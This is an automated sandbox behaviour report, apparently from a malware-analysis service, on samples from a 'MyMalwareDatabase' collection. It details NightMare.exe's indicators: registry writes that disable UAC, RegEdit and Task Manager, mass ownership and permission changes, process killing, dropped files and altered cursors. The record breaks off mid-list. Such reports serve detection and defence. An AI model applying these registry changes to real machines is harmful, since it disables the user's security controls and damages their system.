Overview
overview
10Static
static
7MyMalwareD...og.exe
windows7-x64
7MyMalwareD...og.exe
windows10-2004-x64
7$1/1337/Frog.exe
windows7-x64
3$1/1337/Frog.exe
windows10-2004-x64
3$1/1337/php5ts.dll
windows7-x64
1$1/1337/php5ts.dll
windows10-2004-x64
1$PLUGINSDI...em.dll
windows7-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3MyMalwareD...ry.exe
windows7-x64
1MyMalwareD...ry.exe
windows10-2004-x64
1MyMalwareD...1).exe
windows7-x64
7MyMalwareD...1).exe
windows10-2004-x64
7MyMalwareD...ge.exe
windows7-x64
1MyMalwareD...ge.exe
windows10-2004-x64
1MyMalwareD...64.exe
windows7-x64
1MyMalwareD...64.exe
windows10-2004-x64
1MyMalwareD...re.exe
windows7-x64
10MyMalwareD...re.exe
windows10-2004-x64
10MyMalwareD...ck.bat
windows7-x64
1MyMalwareD...ck.bat
windows10-2004-x64
1MyMalwareD...1).exe
windows7-x64
1MyMalwareD...1).exe
windows10-2004-x64
MyMalwareD...1).exe
windows7-x64
8MyMalwareD...1).exe
windows10-2004-x64
8MyMalwareD...rn.exe
windows7-x64
3MyMalwareD...rn.exe
windows10-2004-x64
3Sulfoxide/...de.exe
windows7-x64
Sulfoxide/...de.exe
windows10-2004-x64
Sulfoxide/...es.exe
windows7-x64
Sulfoxide/...es.exe
windows10-2004-x64
Sulfoxide/...64.exe
windows7-x64
7Sulfoxide/...64.exe
windows10-2004-x64
7Analysis
-
max time kernel
142s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
02-03-2024 20:38
Behavioral task
behavioral1
Sample
MyMalwareDatabase-main/MyMalwareDatabase-main/Frog.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
MyMalwareDatabase-main/MyMalwareDatabase-main/Frog.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
$1/1337/Frog.exe
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
$1/1337/Frog.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
$1/1337/php5ts.dll
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
$1/1337/php5ts.dll
Resource
win10v2004-20240226-en
Behavioral task
behavioral7
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
MyMalwareDatabase-main/MyMalwareDatabase-main/GonnaCry/GonnaCry.exe
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
MyMalwareDatabase-main/MyMalwareDatabase-main/GonnaCry/GonnaCry.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral11
Sample
MyMalwareDatabase-main/MyMalwareDatabase-main/Hydromatic (1).exe
Resource
win7-20240221-en
Behavioral task
behavioral12
Sample
MyMalwareDatabase-main/MyMalwareDatabase-main/Hydromatic (1).exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral13
Sample
MyMalwareDatabase-main/MyMalwareDatabase-main/Losange/Losange.exe
Resource
win7-20240221-en
Behavioral task
behavioral14
Sample
MyMalwareDatabase-main/MyMalwareDatabase-main/Losange/Losange.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral15
Sample
MyMalwareDatabase-main/MyMalwareDatabase-main/Monoxidex64.exe
Resource
win7-20240221-en
Behavioral task
behavioral16
Sample
MyMalwareDatabase-main/MyMalwareDatabase-main/Monoxidex64.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral17
Sample
MyMalwareDatabase-main/MyMalwareDatabase-main/NightMare/NightMare.exe
Resource
win7-20240220-en
Behavioral task
behavioral18
Sample
MyMalwareDatabase-main/MyMalwareDatabase-main/NightMare/NightMare.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral19
Sample
MyMalwareDatabase-main/MyMalwareDatabase-main/NightMare/REGFuck.bat
Resource
win7-20240221-en
Behavioral task
behavioral20
Sample
MyMalwareDatabase-main/MyMalwareDatabase-main/NightMare/REGFuck.bat
Resource
win10v2004-20240226-en
Behavioral task
behavioral21
Sample
MyMalwareDatabase-main/MyMalwareDatabase-main/NoEscape (1).exe
Resource
win7-20240221-en
Behavioral task
behavioral22
Sample
MyMalwareDatabase-main/MyMalwareDatabase-main/NoEscape (1).exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral23
Sample
MyMalwareDatabase-main/MyMalwareDatabase-main/Protactinium (1).exe
Resource
win7-20240221-en
Behavioral task
behavioral24
Sample
MyMalwareDatabase-main/MyMalwareDatabase-main/Protactinium (1).exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral25
Sample
MyMalwareDatabase-main/MyMalwareDatabase-main/Saturn.exe
Resource
win7-20240221-en
Behavioral task
behavioral26
Sample
MyMalwareDatabase-main/MyMalwareDatabase-main/Saturn.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral27
Sample
Sulfoxide/Sulfoxide.exe
Resource
win7-20240215-en
Behavioral task
behavioral28
Sample
Sulfoxide/Sulfoxide.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral29
Sample
Sulfoxide/Sulfoxide_fixes.exe
Resource
win7-20240221-en
Behavioral task
behavioral30
Sample
Sulfoxide/Sulfoxide_fixes.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral31
Sample
Sulfoxide/vcredist_x64.exe
Resource
win7-20240221-en
Behavioral task
behavioral32
Sample
Sulfoxide/vcredist_x64.exe
Resource
win10v2004-20240226-en
General
-
Target
MyMalwareDatabase-main/MyMalwareDatabase-main/NightMare/NightMare.exe
-
Size
42KB
-
MD5
4c5dfe827dd3465bb97016996936fe38
-
SHA1
010b868fe1a9e637912226a1eda1b73d901347dd
-
SHA256
366373109445178df10e219c3d58ea40b435c3cc20f80be7398d199aee01f62b
-
SHA512
e0692e425b7c702d297c88f0495c3bdae53eb566c3128f334d0e87e90a7047c433633f918ab6163a025a488111bcb2f199df0852b338fdc00e524897a2a7d82e
-
SSDEEP
768:73oACIqXSoiSnWsHorfhH7HjVq9HTtYcFA/Vc6K:7TCxNn/orfhbDVqRD8Vcl
Malware Config
Signatures
-
Processes:
NightMare.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" NightMare.exe -
Disables RegEdit via registry modification 1 IoCs
Processes:
NightMare.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" NightMare.exe -
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 18 IoCs
Processes:
takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exepid process 6432 takeown.exe 2476 takeown.exe 3480 takeown.exe 7184 takeown.exe 8280 takeown.exe 3284 takeown.exe 5836 takeown.exe 592 takeown.exe 1620 takeown.exe 4036 takeown.exe 4508 takeown.exe 6196 takeown.exe 7520 takeown.exe 4608 takeown.exe 3008 takeown.exe 2612 icacls.exe 5692 takeown.exe 4340 takeown.exe -
Modifies file permissions 1 TTPs 18 IoCs
Processes:
takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exepid process 6196 takeown.exe 4608 takeown.exe 4036 takeown.exe 3284 takeown.exe 3480 takeown.exe 7184 takeown.exe 3008 takeown.exe 2476 takeown.exe 4340 takeown.exe 592 takeown.exe 6432 takeown.exe 4508 takeown.exe 5692 takeown.exe 7520 takeown.exe 1620 takeown.exe 2612 icacls.exe 5836 takeown.exe 8280 takeown.exe -
Modifies system executable filetype association 2 TTPs 1 IoCs
Processes:
NightMare.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ NightMare.exe -
Processes:
NightMare.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA NightMare.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" NightMare.exe -
Drops file in Windows directory 64 IoCs
Processes:
NightMare.exedescription ioc process File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7327).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7905).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8453).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8904).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(9829).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(5801).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6638).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6270).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7288).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8602).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8988).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(2827).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4276).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8526).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(9429).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(357).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(2189).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6165).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8463).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1179).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(2492).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7487).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8661).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6176).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6545).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8707).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(9612).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(2871).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3612).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(9775).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3484).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3910).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(2124).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(2234).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(2550).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3277).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4538).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6340).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(316).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1335).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8879).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(9163).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1201).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6133).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3242).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3783).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7431).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7946).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8359).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6269).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6941).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(2178).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8917).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4792).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(844).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3274).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1852).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8224).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(9945).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(953).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1611).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4442).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(5106).txt NightMare.exe File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8289).txt NightMare.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 4328 taskkill.exe 5852 taskkill.exe 4356 taskkill.exe -
Modifies Control Panel 14 IoCs
Processes:
NightMare.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\Cursors\SizeWE = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" NightMare.exe Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\Cursors\UpArrow = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" NightMare.exe Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\Cursors\Wait = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" NightMare.exe Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\Cursors\No = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" NightMare.exe Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\Cursors\NWPen = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" NightMare.exe Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" NightMare.exe Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\Cursors\Arrow = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" NightMare.exe Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\Cursors\SizeNS = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" NightMare.exe Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\Cursors\SizeNWSE = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" NightMare.exe Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\Cursors\ = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" NightMare.exe Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\Cursors\Help = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" NightMare.exe Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\Cursors\SizeNESW = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" NightMare.exe Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\Cursors\Hand = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" NightMare.exe Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\Cursors\SizeAll = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" NightMare.exe -
Modifies File Icons 3 IoCs
Processes:
